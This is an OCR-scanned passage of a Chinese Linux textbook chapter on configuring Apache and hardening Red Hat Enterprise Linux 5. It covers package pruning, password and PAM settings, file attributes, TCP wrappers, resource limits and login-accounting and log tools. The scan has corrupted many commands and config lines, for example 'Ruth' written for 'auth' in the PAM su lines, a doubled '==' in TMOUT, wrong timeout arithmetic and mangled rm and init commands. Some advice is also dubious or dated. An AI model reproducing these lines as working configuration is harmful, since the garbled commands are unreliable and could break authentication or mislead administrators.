安装 完 Apache 软件 包 , 并 重启 成 功 后 ,就 可 以 进行 Web 服务 配置 了 ,详细 步骤 如 下 。 

(1) 首先 保存 一 个 网 页 (为 客户 端 测试 做 准备 ) ,例如 ,新 浪 首页 ,另存 为 sina. html, 保 
存在 /var/www/html( 这 是 默认 文档 路 径 ,也 可 以 在 配置 文件 的 第 280 行 设 置 ) 。 

(2) 打开 终端 ,修改 配置 文件 ,命令 为 : # vi /etc/httpd/conf/httpd. conf ,然后 输入 命 
令 “set nu”, 然 后 修改 下 面 几 行 。 
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264 行 修改 为 : # ServerName www. hello. cn:80。 

280 行 修改 为 : DocumentRoot "/var/www/html"。 

390 行 修改 为 : DirectoryIndex sina. html sina. html. var。 

746 行 修改 为 : # AddDefaultCharset GB2312。 

(3) 重启 httpd, 使 配置 生效 。 

(4) 在 客户 端 输入 服务 器 IP 测试 ,也 可 输入 域名 www. hello. cn 进行 测试 ,如 果 能 显示 
新 浪 首页 , 则 表明 配置 成 功 。 


9.3 ”Red Hat Enterprise Linux 5 系统 的 基本 安全 设置 


由 于 Linux 是 免费 的 开放 源 代码 操作 系统 ,所 以 越 来 越 多 地 被 用 做 服务 器 平台 ,而且 随 
着 Linux 下 应 用 软件 的 多 样 化 ,很 多 人 也 喜欢 使 用 Linux 作为 桌面 。 这 一 节 将 把 主要 精力 
放 在 Linux 安全 设置 上 面 。 我 们 通过 系统 设置 和 日 志 查看 来 提高 服务 器 的 安全 性 。 


9.3.1 服务 软件 包 的 安全 性 


1. 安装 过 程 的 安全 性 设置 

熟悉 了 Linux 系统 的 安装 过 程 以 后 ,在 这 里 给 出 一 些 在 安装 过 程 中 应 该 注意 的 与 安全 
有 关 的 问题 。 

(1) 在 分 区 的 时 候 不 要 试图 简单 地 把 所 有 的 空间 都 留 给 根 分 区 ,应 该 把 不 同 的 文件 放 
在 不 同 的 分 区 。 建 议 把 /var 和 /tmp 放 在 不 同 的 分 区 ,如 果 服 务 器 有 较 多 的 用 户 访问 ,一般 
都 应 该 这 样 设置 。 

(2) 把 /var 和 /usr 放 在 不 同 的 分 区 ,这样 可 以 避免 由 于 日 志 或 用 户 的 原因 使 硬盘 被 占 
满 或 直接 导致 服务 器 性 能 降低 。 对 分 区 的 最 后 一 点 建议 就 是 如 果 服 务 器 需要 提供 一 种 或 多 
种 服务 ,一 定 要 把 这 个 服务 有 关 的 东西 放 在 单独 的 一 个 分 区 。 

例如 : 如 果 要 建 一 台 WWW 服务 器 ,在 分 区 的 时 候 一 定 要 留 一 个 单独 的 分 区 (例如 : 
/www) ,将 来 可 以 用 chroot 提高 这 种 服务 的 安全 性 。 

(3) 另外 一 个 重要 的 问题 是 安装 时 软件 包 的 选择 。 用 Red Hat Enterprise Linux 5 作 
为 例子 ,出 于 安全 和 性 能 的 考虑 ,必须 选择 “现在 定制 " 复 选 框 ,这 样 就 可 以 进行 软件 包 的 选 
择 。 有 些 软 件 是 不 必 安 装 的 ,有 些 软 件 是 安装 后 必须 印 载 的 ,有 些 是 安装 后 必须 安装 的 。 

2. 软件 包 的 安全 性 设置 

上 面 提 到 安装 过 程 中 软件 包 的 安全 性 ,现在 就 对 部 分 软件 进行 说 明 ,下面 给 出 安装 包 的 
清单 。 
1) 不 必 安 装 的 软件 包 
Applications/Archiving: dump 
Applications/File: git 
Applications/Internet: finger.ftp,fwhois.ncftp.rsh\rsync, talk、 telnet 


Applications/Publishing: ghostscript .ghostscript - fonts .mpage、\rhs - printfilters 
Applications/System: arpwatch, bind - utils, knfsd - clients、 procinfo, rdate, rdist、 screen、 
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ucd— snmp - utils、Documentation/indexhtm]l 

System Environment/Base: chkfontpath yp - tools 

System Environment/Daemons: XFree86 — xfs, lpr、 pidentd, portmap、routed, rusers、 rwho, tftp、 
ucd— snmp、ypbind 

System Environment/Libraries: XFree86 - libs,libpng 

User Interface/X: XFree86 - 75dpi- fonts .urw- fonts 


2) 安装 后 必须 卸载 的 软件 包 


pump ,apmd isapnptools redhat - logos .mt - st kernel - pcmcia— cs setserial redhat - release、 
eject,linuxconf .kudzu,gd bc getty_ps raidtools pciutils .mailcap、setconsole gnupg 


3) 系统 安装 完成 后 必须 安装 的 软件 包 


autoconf 一 2. 59 - 12. noarch. rpm 

m4 一 1.4 一 53. 1386.rpm 

automake — 1.9.6—2.1.noarch. rpm 

dev86 - 0.16.17 -2.2.1i386. rpm 

bison— 2.3—2.1.1i386.rpm 

byacc — 1.9 - 29.2.2. i386. rpm 

cpp— 4.1.2— 14.1386.rpm 

ctags -5.6-1.1.1i386.rpm 
ElectricFence 一 2.2.2- 20.2.2.1386. rpm 
flex— 2.5.4a— 41.fc6. i386. rpm 

gdb- 6.5— 25.el5. 1i386. rpm 

kernel - headers - 2.6.18— 53.el5. i386.rpm 
glibc ~ devel ~- 2.5— 18.1i386.rpm 

make— 3.81—1.1.1i386. rpm 

patch— 2.5.4— 29.2.2.1386.rpm 


在 对 服务 器 的 所 有 工作 做 完 以 后 ,把 上 面 这 些 软 件 包 从 系统 中 删除 。 这 样 即使 有 非法 
用 户 侵入 了 系统 ,他 也 不 能 在 上 面 编译 程序 ,而 且 这 样 还 可 以 使 管理 员 以 后 对 服务 器 进行 完 
整 性 检查 的 速度 加 快 。 可 以 把 上 面 这 些 软 件 包 保 存在 其 他 存储 介质 上 以 便 以 后 使 用 。 


9.3.2 安全 防范 的 方法 


对 软件 包 的 安全 了 解 了 以 后 ,下 面 进行 系统 设置 ,主要 有 以 下 13 种 方法 。 

1. BIOS 安全 

给 BIOS 设置 密码 ,以 防 通 过 BIOS 改变 启动 顺序 ,这 样 可 以 阻止 别人 试图 用 特殊 的 启 
动 盘 启动 系统 ,还 可 以 阻止 别人 进入 BIOS 改动 其 中 的 设置 。 

2. 删除 所 有 的 特殊 账户 

系统 中 有 许多 预 置 账号 ,如 果 没 有 使 用 ,务必 将 这 些 账号 删 掉 。 这 些 没有 安全 口令 的 账 
号 对 系统 的 安全 性 存在 威胁 。 一 个 值得 注意 的 命令 是 chage, 可 以 使 用 此 命令 设置 账号 的 
时 间 限 制 。 通 过 用 命令 并 chage -help 可 以 了 解 该 命令 的 使 用 方法 。 

删除 所 有 不 用 的 默认 用 户 和 组 账户 的 方法 如 下 。 

删除 用 户 命 令 为 : userdel 用 户 名 

删除 组 命令 : groupdel 组 名 
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3. 设置 合适 的 密码 长 度 

在 选择 正确 密码 之 前 还 应 设置 密码 长 度 或 修改 密码 长 度 : 在 安装 Linux 时 默认 的 密码 
长 度 是 5B。 为 了 提高 密码 的 安全 性 ,应 该 把 密码 的 长 度 加 长 。 修 改 最 短 密码 长 度 需要 编辑 
login. defs 文件 (vi /etc/login. defs) ,即将 下 面 这 行 命令 : 

PASS MIN LEN 5 

改 为 : 

PASS MIN LEN 8 (或 者 可 以 更 长 ), 即 可 加 大 密码 长 度 

login. defs 文件 是 login 程序 的 配置 文件 ,可 以 在 这 个 文件 中 设 定 一 些 其 他 的 安全 策 
略 , 比 如 口令 的 有 效 期 等 。 口令 的 选择 不 应 包括 字典 中 有 的 词汇 ,这 样 是 十 分 危险 的 。 正 确 
的 口令 应 该 足够 长 ,在 容易 记忆 的 前 提 下 ,应 尽量 使 用 一 些 特殊 字符 。 

4. 打开 密码 的 shadow 支持 功能 

启用 密码 的 shadow 功能 ,可 以 对 密码 进行 加 密 。 使 用 /usr/sbin/authconfig 工具 打开 
shadow 功能 ,如 果 要 把 已 有 的 密码 和 组 转变 为 shadow 格式 ,可 以 分 别 使 用 pwconv、 
grpconv 命令 。 

在 终端 下 首先 输入 : 

# /usr/sbin/authconfig 


然后 输入 : 


# pwconv www( 用 户 名 ) 
井 grpconv group( 组 名 ) 


S. 修改 /etc/host. conf 文件 

Linux 下 /etc/host. conf 说 明了 地 址 解析 的 顺序 。 通 过 编辑 /etc/host. conf 文件 (vi/ 
etc/host. conf) ,加 入 下 面 这 行 : 

# Lookup names via DNS first then fall back to /etc/hosts. order bind hosts 

# We have machines with multiple IP addresses. multion 

# Check for IP address spoofing. Nospoof on 

第 一 项 设置 首先 通过 DNS 解析 IP 地 址 ,然后 通过 hosts 文件 解析 。 

第 二 项 设置 检测 “/etc/hosts” 文 件 中 的 主机 是 否 拥有 多 个 IP 地 址 (比如 有 多 个 以 太 口 
网 卡 )。 

第 三 项 设置 说 明 要 注意 对 本 机 未 经 许可 的 电子 欺骗 。 

6. 权限 与 文件 系统 

Linux 的 ext3 文件 系统 有 属性 功能 这 个 特点 。 可 以 用 lsattr 命令 列 出 文件 的 属性 ,用 
chattr 命令 改变 文件 的 属性 。 文 件 系统 的 属性 有 很 多 种 ,在 这 里 要 注意 的 是 两 个 属性 : 

a 只 可 添加 属性 

i 不 可 改变 属性 

对 于 系统 中 的 配置 文件 ,最 好 设置 不 可 改变 属性 ,而 对 于 一 些 日 志文 件 最 好 设置 只 可 添 
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加 属性 。 下 面 是 两 个 具体 的 例子 : 


chattr +i /etc/samba.conf 
chattr +a /var/log/secure 


如 果 要 去 掉 这 些 属性 ,将 上 面 命令 中 的 “十 ”号 变 为 “一 ”号 。 

另外 ,要 对 mount 的 文件 系统 做 限制 ,这 个 配置 在 /etc/fstab 中 。 通 过 设置 mount 选项 
可 以 使 mount 上 的 文件 系统 更 安全 。 常 用 的 mount 选项 有 default、nodev、noexec、nosuid、 
noatime、ro、user 等 。 

通过 编辑 /etc/services 文件 ,禁止 未 经 许可 地 删除 或 添加 服务 。 

命令 为 : 


# chattr +i /etc/services 


7. 禁止 从 不 同 的 控制 台 进行 root 登录 

etc/securetty 文件 是 管理 root 用 户 允 许 从 哪个 TTY 设备 进行 登录 的 文件 。 通 过 编 
辑 /etc/securetty 文件 ,在 不 需要 登录 的 TTY 设备 前 添加 * 井 ”标志 ,达到 禁止 从 该 TTY 设 
备 进行 root 登录 的 目的 。 

8. 禁止 其 他 用 户 通过 su 命令 改变 为 root 用 户 

su 命令 允许 用 户 成 为 系统 中 其 他 已 存在 的 用 户 。 如 果 不 希 望 任何 人 通过 su 命令 改变 
为 root 用 户 或 对 某 些 用 户 限制 使 用 su 命令 ,可 以 在 su 配置 文件 (在 /etc/pam. d/ 目 录 下 ) 
的 开头 添加 下 面 两 行 : 


Ruth sufficient/l1ib/security/pam_rootok. so debug 
Ruth required/1lib/security/Pam_wheel. so group = groupname 


这 表明 只 有 groupname 组 的 成 员 可 以 使 用 su 命令 成 为 root 用 户 。 可 以 把 用 户 添加 到 
groupname 组 ,以 使 它 可 以 使 用 su 命令 成 为 root 用 户 。 

命令 : 

# usermod - G10 admin 

9. 取消 普通 用 户 的 控制 台 访问 权限 

取消 普通 用 户 的 控制 台 访 问 权 限 ,如 shutdown、reboot、halt 等 命令 。 可 以 通过 运行 下 
面 的 命令 来 实现 : 

rm 一 上 /etc/security/console. apps/servicename 

禁止 使 用 Ctrl 十 Alt 十 Delete 键盘 关闭 命令 。 

在 /etc/inittab 文件 中 注释 掉 下 面 这 行 (使 用 # ): 

ca: :ctrlaltdel:/sbin/shutdown 一 t3 —r now 

改 为 : 

#ca::ctrlaltdel:/sbin/shutdown 一 t3 一 now 

为 了 使 这 项 改动 起 作用 ,输入 下 面 这 个 命令 : 

#/sbin/init 了 
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10. TCP_WRAPPERS 

使 用 TCP_WRAPPERS 可 以 使 系统 增加 面 对 外 部 入 侵 的 安全 性 。 最 好 的 策略 就 是 阻 
止 所 有 的 主机 (在 /etc/hosts. deny 文件 中 加 入 “ALL:ALL@ ALL,PARANOID”) ,然后 再 
在 /etc/hosts. allow 文件 中 加 入 所 有 允许 访问 的 主机 列表 。 

第 一 步 ; 

编辑 hosts. deny 文件 (vi/etc/hosts. deny) ,加 入 如 下 命令 : 


# Deny access to everyone 


ALL: ALL@ALL,PARANOID 这 表明 除非 该 地 址 包含 在 允许 访问 的 主机 列表 中 , 否 
则 阻塞 所 有 的 服务 和 地 址 。 

第 二 步 : 

编辑 hosts. allow 文件 (vi/etc/hosts. allow) ,加 入 允许 访问 的 主机 列表 。 

比如 : ftp: 219. 246. 5.126 hello. cn 

219. 246. 5. 126 和 hello. cn 是 允许 访问 FTP 服务 的 IP 地 址 和 主机 名 称 。 

通过 下 面 的 方法 使 系统 对 ping 不 进行 响应 : 

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_al1 

用 下 面 的 命令 可 以 提高 系统 防止 SYN 攻击 的 能 力 : 


# echo 1 > /proc/sys/net/ipv4/tcp_syncookies 


上 述 命令 都 需要 加 入 /etc/re. d/rc. local 文件 中 方 可 。 

11. 系统 资源 限制 使 用 

编辑 limits. conf 文件 (vi /etc/security/limits. conf) ,加 入 或 改变 下 面 这 些 行 。 

* hard core 0 

* hard rss 5000 

* hard nproc 20 

这 些 行 的 意思 是 : 

“core 0” 表 示 禁 止 创建 core 文件 。 

“nproc 20” 把 最 多 进程 数 限制 到 20。 

“rss 5000” 表 示 除 了 root 之 外 ,其 他 用 户 都 最 多 只 能 用 5MB 内 存 。 

上 面 这 些 都 只 对 登录 到 系统 中 的 用 户 有 效 。 通 过 上 面 这 些 限 制 , 就 能 更 好 地 控制 系统 
中 的 用 户 对 进程 ,core 文件 和 内 存 的 使 用 情况 。 星 号 ” * ”表示 的 是 所 有 登录 到 系统 中 的 用 
户 。 然 后 必须 编辑 /etc/pam. d/login 文件 ,在 文件 末尾 加 入 下 面 这 一 行 命令 : 

session required /lib/security/pam_limits. so 
方 可 。 

12. root 账户 

在 Linux 系统 中 root 账户 是 具有 最 高 特权 的 。 如 果 系 统管 理 员 在 离开 系统 之 前 忘记 
注销 root 账户 ,系统 会 自动 注销 。 通 过 修改 账户 中 的 TMOUT 参数 ,可 以 实现 此 功能 。 
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TMOUT 按 秒 计算 。 编 辑 profile 文件 (vi/etc/profile) ,在 “HISTFILESIZE=” 后 面 加 入 下 
面 这 行 : TMOUT==1800,1800 表示 30X60 王 3600s, 也 就 是 0. 5h。 这 样 ,如 果 系统 中 登录 
的 用 户 在 半 个 小 时 内 都 没有 动作 ,那么 系统 会 自动 注销 这 个 账户 。 可 以 在 个 别 用 户 的 
“. bashrc” 文 件 中 添加 该 值 , 以 便 系统 对 该 用 户 实行 特殊 的 自动 注销 时 间 。 改 变 这 项 设置 
后 ,必须 先 注销 用 户 ,再 用 该 用 户 登 录 才 能 激活 该 功能 。 

13. 减少 历史 命令 数量 

使 用 户 保存 少量 的 使 用 过 的 命令 ,可 以 把 /etc/profile 文件 中 的 HISTFILESIZE 和 
HISTSIZE 行 的 值 设 为 一 个 较 小 的 数 ,比如 30。 编 辑 profile 文件 (vi/etc/profile) ,修改 为 
如 下 的 配置 即 可 : 


HISTFILESIZE = 30 
HISTSIZE = 30 


该 命令 表示 每 个 用 户 只 可 以 保存 30 条 旧 命 令 。 
9.3.3 账户 安全 设置 


Linux 环境 中 的 账户 安全 就 是 使 用 一 些 工具 更 加 方便 有 效 地 管理 账户 信息 。 最 初 开发 
的 系统 记 账 功能 用 于 跟踪 用 户 资源 消耗 情况 ,并 以 从 用 户 账号 中 提取 费用 为 目的 。 现 在 该 
项 功能 可 以 用 于 安全 目的 ,给 人们 提供 有 关系 统 中 发 生 的 各 种 活动 的 有 价值 的 信息 。 下 面 
来 介绍 几 个 基于 命令 行 的 工具 。 

1. ac 命令 

ac 命令 提供 了 有 关 用 户 连 接 的 大 概 统计 ,可 以 使 用 带 有 参数 4 和 p 的 ac 命令。 参数 d 
显示 了 一 天 的 总 连接 统计 ,参数 p 显示 了 每 一 个 用 户 的 连接 时 间 。 这 种 统计 信息 的 方式 对 
了 解 与 探测 人 侵 有 关 的 用 户 情况 及 其 他 活动 很 有 帮助 ,如 下 所 示 : 


#ac-d 
Jul 26 total 9.30 
Jul 26 total 4.46 
Today total 了 
# ac -P 
root 16.92 
total 16.92 
2. who 命令 


who 是 出 于 安全 角度 定期 使 用 的 最 常用 命令 ,使 用 命令 who -help 获得 帮助 ,下 面 使 用 
参数 a 来 进行 查看 ,如 下 所 示 : 


# who -a 
2009 -07-27 12:08 489 id= si term= 0 exit=0 
System boot 2009 -07-27 12:08 
run- level5 2009-07-27 12:08 last=S 
2009 -07- 26 20:10 2076 id= 15 term= 0 exit=0 
2009- 07- 26 20:10 4359 id=1 
LOGIN tty2 2009 07- 26 20:10 4362 id=2 


2009 07- 26 20:10 4370 id=3 
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LOGIN tty4 2009 07- 26 20:10 4373 id= 4 
LOGIN tty5 2009 07- 26 20:10 4374 id=5 
2009 07- 26 20:10 4380 id=6 
2009 07- 26 20:10 4383 id=x 
root + pts/0 2009- 07-26 21:53 old 10632 (:0.0) 
pts/1 2009 -07 一 26 21:49 0 id=/1 term= 0 exit=0 


who 命令 的 主要 作用 是 报告 目前 正在 登录 的 用 户 、 登 录 设备 .远程 登录 主机 名 或 使 用 
的 Xwindows 的 X 显示 值 、 会 话 闲置 时 间 以 及 会 话 是 否 接受 write 或 talk 等 信息 。 

3. last 命令 

last 命令 提供 每 一 个 用 户 的 登录 时 间 、 退 出 登录 时 间 、 登 录 位 置 、 重 新 引导 系统 及 运行 
级 别 变化 的 信息 。last -10 表示 last 的 最 多 输出 结果 为 最 近 的 10 条 信息 。 如 下 所 示 : 


# last -10 

root pts/0 0.0 Sun Jul 26 21:49 still logged in 
root pts/1 0.0 Sun Jul 26 21:49 - 21:49 (00:00) 
root pts/0 0.0 Sun Jul 26 21:48 - 21:49 (00:01) 
root pts/1 0.0 Sun Jul 26 21:10 - 21:30 (00:19) 
root pts/0 0.0 Sun Jul 26 21:10 - 21:24 (00:14) 
root pts/0 0.0 Sun Jul 26 21:02 - 21:08 (00:05) 
root pts/0 0.0 Sun Jul 26 21:01 - 21:02 (00:00) 
root pts/0 0.0 Sun Jul 26 20:30 - 20:50 (00:19) 
root pts/0 0.0 Sun Jul 26 20:13 - 20:27 (00:13) 


root :0 Sun Jul 26 20:11 still logged in 


默认 时 last 将 列 出 在 /var/log/wtmp 中 记录 的 每 一 连接 和 运行 级 别 的 变化 。 从 安全 角 
度 考虑 ,last 命令 提供 了 迅速 查看 特定 系统 连接 活动 的 一 种 方式 。 应 每 天 观察 输出 的 结果 ， 
从 中 可 以 捕获 到 异常 输入 项 。Last 命令 的 -x 选项 可 以 通知 系统 运行 级 别 的 变化 。 下 面 则 
是 输入 last -x 的 结果 。 


#1ast -x 

root pts/0 :0.0 Tue Jul 28 09:05 still logged in 
root pts/0 :0.0 Tue Jul 28 08:59 - 09:04 (00:04) 
root :人 Tue Jul 28 08:58 still logged in 
runlevel (to lvl 5) 2.6.18-53.el5xen Wed Jul 29 00:46 - 09:05 (-15:-40) 
reboot system boot 2.6.18-53.el5xen Wed Jul 29 00:46 (-15:-40) 


runlevel (to lvl 0) 2.6.18-53.el5xen Sun Jul 26 22:46 - 00:46 (2+01:59) 


root pts/0 :0.0 Sun Jul 26 22:41 - 22:42 (00:00) 
root pts/0 :0.0 Sun Jul 26 22:39 - 22:41 (00:02) 
root pts/0 :0.0 Sun Jul 26 22:37 - 22:39 (00:02) 
root pts/0 :0.0 Sun Jul 26 22:31 - 22:37 (00:06) 
root pts/0 :0.0 Sun Jul 26 21:53 - 22:08 (00:14) 
root pts/0 :0.0 Sun Jul 26 21:49 - 21:53 (00:04) 
root pts/1 :0.0 Sun Jul 26 21:49 - 21:49 (00:00) 
root pts/0 :0.0 Sun Jul 26 21:48 - 21:49 (00:01) 
root pts/1 :0.0 Sun Jul 26 21:10 - 21:30 (00:19) 
root pts/0 :0.0 Sun Jul 26 21:10 - 21:24 (00:14) 
root pts/0 :0.0 Sun Jul 26 21:02 - 21:08 (00:05) 
root pts/0 :0.0 Sun Jul 26 21:01 - 21:02 (00:00) 
root pts/0 :0.0 Sun Jul 26 20:30 - 20:50 (00:19) 
root pts/0 :0.0 Sun Jul 26 20:13 - 20:27 (00:13) 
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root :0 Sun Jul 26 20:11 - 22:46 (02:34) 
runlevel (to lvl 5) 2.6.18-53.el5xen Mon Jul 27 12:08 - 22:46 (-13:-21) 
reboot system boot 2.6.18-53.el5xen Mon Jul 27 12:08 (-13:-21) 
root :0 Sun Jul 26 19:32 - crash (16:35) 
runlevel (to lvl 5) 2.6.18-53.el5xen Mon Jul 27 11:26 - 12:08 (00:41) 
reboot system boot 2.6.18-53.el5xen Mon Jul 27 11:26 (-12:-39) 
root pts/0 :0.0 Sun Jul 26 19:22 - crash (16:03) 
root :0 Sun Jul 26 19:19 - crash (16:06) 
runlevel (to lvl 5) 2.6.18-53.el5xen Sun Jul 26 19:13 - 11:26 (16:13) 
reboot system boot 2.6.18-53.el5xen Sun Jul 26 19:13 (03:33) 


wtmp begins Sun Jul 26 19:13:10 2009 


4. sa 命令 

与 ac 命令 一 样 ,sa 是 一 个 统计 命令 。 该 命令 可 以 获得 每 个 用 户 或 每 个 命令 的 进程 使 用 
的 大 致 情况 ,并 且 提 供 了 系统 资源 的 消耗 信息 。 在 很 大 程度 上 ,sa 又 是 一 个 记 账 命令 ,对 于 
识别 特殊 用 户 ,特别 是 已 知 特殊 用 户 使 用 的 可 疑 命令 十 分 有 用 。 另 外 ,由 于 信息 量 很 大 , 需 
要 处 理 脚 本 或 程序 筛选 这 些 信 息 。 可 以 用 命令 "sa -u | grep 用 户 名 ”来 单独 限制 用 户 。 如 下 
所 示 : 


#9 sa -ul|grep root 


root 0.03 cpu 1200k mem getopt 

root 0.03 cpu 1201k mem basename 

root 0.02 cpu 1202k mem basename 

root 0.01 cpu 1201k mem basename 

root 0.02 cpu 1202k mem basename 

root 0.01 cpu 1459k mem makewhatis 类 
root 0.04 cpu 1205k mem head 

root 0.01 cpu 1403k mem lsb_release 类 
root 0.01 cpu 1404k mem lsb_release 关 
root 0.03 cpu 1223k mem sed 

root 0.00 cpu 1403k mem lsb_release 关 
root 0.11 cpu 1404k mem lsb_release 

root 0.03 cpu 1403k mem sh 

root 0.01 cpu 504k mem zcat 

root 0.02 cpu 1392k mem sh 

root 0.06 cpu 1431k mem gawk 

root 0.02 cpu 504k mem zcat 

root 0.04 cpu 1219k mem iconv 

root 0.01 cpu 1459k mem makewhatis 关 
root 0.04 cpu 504k mem zcat 

root 0.04 cpu 1392k mem sh 


输出 结果 从 左 到 右 依次 为 : 用 户 名 .CPU 使 用 时 间 秒 数 、 命 令 ( 最 多 为 16 个 字符 ) 。 

5. lastcomm 

lastcomm 命令 与 sa 命令 不 同 ,lastcomm 命令 提供 每 一 个 命令 的 输出 结果 ,同时 打印 
出 与 执行 每 个 命令 有 关 的 时 间 印 惟 。 就 这 一 点 而 言 , lastcomm 比 sa 更 有 安全 性 。 
lastcomm 命令 使 用 命令 名 、 用 户 名 或 终端 名 作为 变量 。 该 命令 可 以 查询 进程 记 账 数据 库 。 
下 面 显示 lastcomm root 的 输出 结果 ,每 行 表 示 命 令 的 执行 情况 ,从 左 到 右 依 次 为 : 用 户 、 设 
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备 、 使 用 的 CPU 时 间 秒 数 、 执 行 命令 的 日 期 和 时 间 。 如 下 所 示 : 


# lastcomm root 


sh root < 0.04 secs Sun Jul 26 21:22 
lsb_release root es 0.10 secs Sun Jul 26 21:22 
lsb release F root 0.01 secs Sun Jul 26 21:22 
sed root 四 0.03 secs Sun Jul 26 21:22 
lsb_release F root = 0.02 secs Sun Jul 26 21:22 
lsb release F root = 0.02 secs Sun Jul 26 21:22 
head root =- 0.02 secs Sun Jul 26 21:22 
makewhatis F root 0.01 secs Sun Jul 26 21:22 
basename root 0.02 secs Sun Jul 26 21:22 
basename root = 0.02 secs Sun Jul 26 21:22 
basename root 四 0.03 secs Sun Jul 26 21:22 
basename root ea 0.02 secs Sun Jul 26 21:22 
iconv root 0.03 secs Sun Jul 26 21:22 
getopt root 四 0.04 secs Sun Jul 26 21:22 
zcat root 0.01 secs Sun Jul 26 21:22 
getopt root = 0.01 secs Sun Jul 26 21:22 
gawk root 0.06 secs Sun Jul 26 21:22 
sh root 0.03 secs Sun Jul 26 21:22 
zcat root 0.01 secs Sun Jul 26 21:22 
makewhatis 了 root Ce 0.01 secs Sun Jul 26 21:22 
iconv root 3 0.03 secs Sun Jul 26 21:22 
zcat root 0.00 secs Sun Jul 26 21:22 
gawk root Ee 0.07 secs Sun Jul 26 21:22 
sh root 0.02 secs Sun Jul 26 21:22 


如 果 系 统 被 人 侵 ,就 应 对 在 utmp 和 wtmp 中 记录 的 信息 引起 注意 ,因为 这 些 信息 可 能 
被 修改 过 了 。 另 外 有 可 能 有 人 替换 who 程序 来 隐藏 修改 信息 。 通 常 , 在 已 经 识别 某 些 可 疑 
活动 后 ,进程 记 账 可 以 有 效 地 发 挥 作用 。 使 用 lastcomm 可 以 隔绝 用 户 活动 或 在 特定 时 间 执 
行 命令 。 但 是 使 用 该 命令 必须 设置 为 打开 状态 。 一 般 来 看 ,/var/run/utmp 是 动态 数据 库 
文件 。 而 /var/log/wtmp 文件 随 着 输入 项 的 增加 和 修改 而 增加 。 问 题 在 于 这 些 文件 处 于 动 
态 增加 状态 ,因此 到 一 定 程度 就 会 变 得 很 大 。 可 以 通过 一 个 叫 logrotate 的 程序 来 解决 上 面 
这 个 问题 ,该 程序 读 入 /etc/logrotate. conf 配置 文件 ,该 配置 文件 告诉 logrotate 所 要 读 
/etc/logrotate. d 目录 中 的 文件 。 可 以 通过 它 来 设 定 日 志文 件 的 循环 时 间 。 


9.3.4 系统 日 志 安 全 


在 Linux 下 使 用 各 种 日 志文 件 , 有 些 用 于 某 些 特殊 用 途 , 例 如 : /var/log/xferlog 用 于 
记录 文件 传输 协议 FTP 的 信息 。 其 他 日 志文 件 ,例如 /var/log/messages 文件 通常 包含 许 
多 系统 和 内 核 工 具 的 输入 项 。 这 些 日 志文 件 为 系统 的 安全 状态 提供 了 信息 。 这 里 主要 讲 两 
个 日 志 守 护 程序 syslog 和 klogd, 并 且 简 要 叙述 由 Linux 操作 系统 生成 的 其 他 日 志文 件 , 便 
于 说 明基 本 的 配置 情况 。 

1. syslog 系统 日 志 工具 

syslog 是 Linux 下 的 日 志 子 系统 ,负责 发 送 、 记 录 系 统 内 核 及 工具 所 产生 的 信息 ,由 
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syslog() 调 用 、syslogd 守护 进程 和 配置 文件 /etc/syslog. conf 组 成 。 当 系统 内 核 及 工具 产 
生 信息 时 ,通过 调用 syslog() ,把 信息 送 往 syslogd,syslogd 再 根据 /etc/syslog. conf 中 的 配 
置 要 求 ,将 这 些 信息 分 别 进行 相应 的 处 理 。 通 过 syslog. conf 的 配置 ,可 以 灵活 地 对 信息 的 
发 送 和 保存 进行 控制 。 

大 部 分 的 Linux 系统 中 都 要 使 用 syslog 工具 , 它 是 相当 灵活 的 ,能 使 系统 根据 不 同 的 
日 志 输 入 项 采取 不 同 的 活动 。syslog 工具 由 一 个 守护 程序 组 成 。 它 能 接受 访问 系统 的 日 志 
信息 并 且 根 据 /etc/syslog. conf 配置 文件 中 的 指令 处 理 这 些 信息 。 程 序 、. 守 护 进程 和 内 核 提 
供 了 访问 系统 的 日 志 信 息 。 因 此 ,任何 希望 生成 日 志 信息 的 程序 都 可 以 向 syslog 接口 呼叫 
生成 该 信息 。 通 常 , syslog 接受 来 自 系 统 的 各 种 功能 的 信息 ,每 个 信息 都 包括 重要 级 。 
/etc/syslog. conf 文件 通知 syslogd 如 何 根据 设备 和 信息 重要 级 别 来 报告 信息 。syslog 守 
护 程序 是 由 /etc/rc. d/init. d/syslog 脚本 在 运行 级 2 下 被 调用 的 ,默认 不 使 用 选项 。 但 有 两 
个 选项 -r 和 -h 很 有 用 。 如 果 将 要 使 用 一 个 日 志 服 务 器 ,必须 调用 syslogd -r。 默 认 情况 下 
syslog 不 接受 来 自 远程 系统 的 信息 。 当 指定 -r 选项 ,syslogd 将 会 监听 从 514 端口 上 进来 
的 UDP 包 。 如 果 还 希望 日 志 服 务 器 能 传送 日 志 信 息 ,可 以 使 用 -h 标志 。 缺 省 时 ,syslogd 
将 忽略 ,使 其 从 一 个 远程 系统 传送 日 志 信息 到 另 一 个 系统 的 /etc/syslog. conf 输入 项 。 

2. klogd 守护 进程 

klogd 守护 进程 获得 并 记录 Linux 内 核 信 息 。 通 常 syslogd 会 记录 klogd 传 来 的 所 有 
信息 ,然而 ,如 果 调 用 带 有 -f filename 变量 的 klogd 时 ,klogd 就 在 filename 中 记录 所 有 信 
息 ,而 不 是 传 给 syslogd。 当 指定 另外 一 个 文件 进行 日 志 记 录 时 ,klogd 就 向 该 文件 中 写 入 
所 有 级 别 或 优先 权 。klogd 中 没有 和 /etc/syslog. conf 类 似 的 配置 文件 。 使 用 klogd 而 避免 
使 用 syslogd 的 好 处 在 于 可 以 查找 大 量 错误 。 如 果 有 人 入 侵 了 内 核 , 使 用 klogd 可 以 修改 
错误 。 

3. 其 他 日 志 

在 /var/log 和 不 同 版 本 的 系统 中 以 及 自己 配置 的 应 用 程序 中 都 可 以 找到 其 他 日 志文 
件 。 当 然 ,/etc/syslog. conf 列 出 了 由 syslogd 管理 的 所 有 日 志文 件 名 和 位 置 。 其 他 日 志 由 
其 他 应 用 程序 管理 。Apache Server 生成 /var/log/htmlaccess. log 文件 记录 客户 访问 ,生成 
/var/log/httpd/error. log 文件 在 syslog 以 外 查找 错误 。cron 工具 维护 的 信息 日 志文 件 为 
/var/log/cron。 当 Linuxconf 工具 记录 系统 重新 配置 信息 时 ,将 生成 日 志文 件 如 /var/log/ 
nerconf. log。Samba 在 /var/log/samba 中 维护 其 日 志 信息 。 另 外 由 于 syslogd 在 系统 非常 
繁忙 时 ,可 能 会 丢失 信息 ,所 以 ,可 以 用 cyclog 替换 syslog。cyclog 缓存 日 志 信息 并 确保 日 
志文 件 是 同步 的 ,并 且 自 动 交替 循环 其 管理 的 日 志文 件 。 


9.4 Red Hat Enterprise Linux 5 系统 的 安全 工具 


